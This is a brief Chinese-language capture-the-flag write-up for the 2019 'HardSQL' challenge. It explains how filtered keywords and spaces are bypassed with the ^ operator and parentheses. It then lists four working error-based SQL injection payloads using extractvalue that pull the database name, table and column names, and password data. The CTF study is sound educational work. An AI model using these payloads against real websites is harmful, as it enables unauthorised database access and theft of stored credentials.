[极客大挑战 2019]HardSQL
·
阿巴阿巴,再也不想看到sql注入了
大部分注入都是这个画面

试了下 and union 空格 = 都给过滤了,而且是优先识别是否有问题再执行的语句
^ 能并行执行语句也是学到了,空格是用括号绕过的。
直接上wp吧,反正给我整晕了
?username=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23
?username=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23
?username=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23
?username=admin'^extractvalue(1,concat(0x5c,(select(group_concat(right(password,25)))from(H4rDsq1))))%23
更多推荐


所有评论(0)